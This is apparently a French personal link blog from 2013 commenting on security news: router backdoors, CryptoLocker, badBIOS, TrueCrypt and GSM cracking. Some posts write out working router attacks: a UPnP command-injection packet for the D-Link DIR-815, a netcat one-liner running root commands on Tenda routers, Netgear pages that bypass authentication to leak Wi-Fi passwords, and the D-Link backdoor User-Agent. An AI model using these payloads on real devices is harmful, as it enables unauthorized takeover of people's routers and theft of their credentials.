2034 private links
F-Secure lance son application pour gérer les droits des applications. Je vais la tester, j'aimerai bien me passer de LBE Security Master.
Un petit soft pour prévenir une infection de CryptoLocker. Il suffit de le lancer une fois, ensuite l'exécutable peut-être supprimé.
Pour infos, CryptoLocker est un ransomware bien chiant puisque les fichiers infectés sont chiffrés à l'aide d'un clef RSA 2048 bits, donc pas de crackage de clef possible, il faut vraiment payer (mais ne le faîtes pas !).
Ça fait une petite base mine de rien.
Voici le routeur DLink DIR-815 qui se fait rooter, un packet :
M-SEARCH * HTTP/1.1
HOST:239.255.255.250:1900
ST:uuid:ICI LA COMMANDE
MX:2
MAN:"ssdp:discover"
à envoyer en multicast sur 239.255.255.250, pour le port UDP 1900.
Il y a un script python qui permet de lancer la commande désirée : https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection
Que c'est mouvementé en ce mois d'octobre !
Voici une nouvelle porte dérobée découverte dans les routeurs NETGEAR WNDR3700v4, WNDR3800 et WNDR4700.
C'est assez tendu puisqu'en visitant la page suivante, même en redémarrant le routeur, ça reste open bar :
http://<router address>/BRS_02_genieHelp.html
Et pour avoir les mots de passe Wi-Fi en clair... :
http://<router address>/BRS_success.html
Bref, ça pue, ça pue, ça pue !
Mais que font les développeurs, bordel de bordel de merde ?!
Édit : plus d'infos, histoire de passer des commandes shell : http://shadow-file.blogspot.fr/2013/10/netgear-root-compromise-via-command.html
(copie du script) http://www.tiger-222.fr/paste/?3ec20a62650c94a5#m8h84Z277Ajt/NqYpt1ZeEbGiHwOvzvSGv78v39pjCw=
Édit 2 : apparemment, pas mal de NetGear ont un mot de passe root codé en dur :
https://netgear-telnetenable.googlecode.com/svn/trunk/telnetenable.py
(copie) http://www.tiger-222.fr/paste/?7b254ecdd7f4887c#O9XModbrfDcCki7HgEX9gpZFy8WuM6YRA8/iPw7SWB0=
Tien, je n'avais pas vu passer ce "badbios", mais s'il s'avère réel, c'en est fini pour nous !
C'est un virus (si on peut appelé ça comme ça) qui infecte le firmware des clefs USB, aucun fichier n'est modifié sur la clef. Comme d'hab, toutes les clefs USB seront à leur tour infectées. Et donc ce virus reflashe le BIOS, même une réinstallation officielle du BIOs n'y changera rien. Le pire dans tout ça, c'est comment il communique...
Interview d'un des développeurs de TrueCrypt.
Version française : http://www.tiger-222.fr/?d=2013/10/26/21/33/57-truecrypt-entretien-avec-ennead
Cet article sous-entend que - contrairement aux rumeurs - les binaires de TrueCrypt correspondent bien aux sources : donc qu'il n'y a pas de backdoor.
Pour 30$, tout le monde peux désormais cracker le chiffrement GSM.
Peut-être encore plus facile que cette porte dérobée : http://www.tiger-222.fr/links/?GrEUOQ
Tout se passe au niveau de la forge du packet :
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 IP_routeur 7329
Notez le "/bin/ls" dans le "echo", c'est la commande qui sera exécutée en root...
Ça concerne les routeurs Tenda W302R, Tenda W330R ou encore Medialink MWN-WAPR150N. Ils utilisent tous le mot magique "w302r_mfg". Doit bien y en avoir d'autres va...
Raaahh ! Non ! Non et NON !
Le fameux service de partage de photos "sécurisé" où elles sont supprimées rapidement a, en fait, fais des copies de ces photos et avoue avoir coopérer avec le gouvernement US...
Outch, suffirait de modifier l'User-Agent en "xmlset_roodkcableoj28840ybtide" pour avoir un accès total au routeur. Merci Joel ;)
Routeurs :
D-Link DIR-100
D-Link DIR-120
D-Link DI-524UP
D-Link DI-604S
D-Link DI-604UP
D-Link DI-604+
D-Link DI-624
D-Link TM-G5240
Planex BRL-04R
Planex BRL-04UR
Planex BRL-04CW
...
C'est du propre ! Faut voir les vidéos de démonstration, ça va être super pratique pour certains domaines (imagerie médicale), mais aussi dangereux pour ce qui est surveillance et vie privée (vlà le détecteur de mensonges...).
Mémo Nmap.
Lien vers le PDF : http://www.infographiste-prod.ch/la_hyene/wp-content/uploads/2013/10/NmapCheatSheetv1.0.pdf
C'est bien dit, bien expliqué => à faire tourner partout, partout, partout. Dans les classes en priorité.
via http://lehollandaisvolant.net/index.php?mode=links&id=20131002124230
" Ouch... l'ancien responsable européen de la protection de la vie privée chez Microsoft Europe déclare qu'il ne fait plus confiance à Microsoft. Et qu'il faut désormais se tourner vers l'opensource. "
Ah ouai, quand même !
Rappel qui ne fait pas de mal : toujours échapper/valider/filtrer les entrées utilisateur.
Et bien ! Il s'agit là d'une démonstration, et ça pourrait faire mal.
Dans un seul et même fichier (exécutable valide pour GNU/Linux, Mac et Windows), il y a un PDF, un JAR (java) et une page HTML + JS.
D'où vient la prouesse ? Simplement du fait que les entêtes de ces fichiers ne sont pas obligatoirement en début de fichier (comme les JPEG ou le PNG). Du coup, on peut faire un peu tout ce qu'on veut. C'est mâlin !
Ça parle de StartSSL.
Ah ah !! AH AH !! Génial ouais !! ><
Un torrent de 2.9 Go :)
Merci Fred !